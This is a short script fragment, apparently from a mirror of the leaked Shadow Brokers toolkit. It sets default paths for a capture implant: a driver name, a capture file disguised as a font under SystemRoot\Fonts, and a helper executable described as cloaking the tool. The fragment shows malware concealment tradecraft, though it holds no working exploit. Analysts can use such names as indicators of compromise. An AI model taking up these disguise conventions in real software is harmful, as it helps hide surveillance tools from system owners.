shadowbrokers-exploits/windows/Resources/Ep/Scripts/Capn/getDefaults.eps
2017-04-14 11:45:07 +02:00

7 lines
284 B
PostScript

sub getDefaultPaths(REF string $driver, REF string $captureFile, REF string $helperFile)
{
$driver = "serport";
$captureFile = "\\SystemRoot\\Fonts\\vga_ds.tff";
# this is the one that cloaks/uncloaks it is put in system root
$helperFile = "wdiconf.exe";
}